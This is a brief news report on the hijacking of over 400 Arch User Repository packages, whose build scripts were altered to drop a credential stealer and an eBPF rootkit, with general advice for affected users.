Over 400 Arch Linux AUR Packages Hijacked to Deploy Infostealer and eBPF Rootkit

Attackers compromised over 400 packages in the Arch User Repository (AUR) this week, modifying their build scripts to deploy a credential stealer. This malware, a Rust binary, targets developer secrets and can install an eBPF rootkit to conceal its presence when it gains root privileges. The AUR serves as a community-driven package repository for Arch Linux and operates independently of the official repositories. The compromise was discovered by security researchers who observed malicious code within the build scripts of numerous AUR packages. The attackers appear to have gained control of maintainer accounts for these packages, allowing them to push their malicious updates. The stolen credentials could include API keys, SSH keys, and other sensitive information, potentially leading to further system compromises or data breaches. The eBPF rootkit, if successfully deployed, would make the malware exceptionally difficult to detect and remove, as it operates at the kernel level. Arch Linux users are advised to review their installed AUR packages and to be cautious when building packages from the AUR, especially those with a recent history of updates or those maintained by newly created accounts. The Arch Linux security team has been notified and is working to remediate the compromised packages and investigate the full extent of the breach. This incident highlights the security risks associated with community-maintained software repositories and the importance of robust security practices for package maintainers and users alike.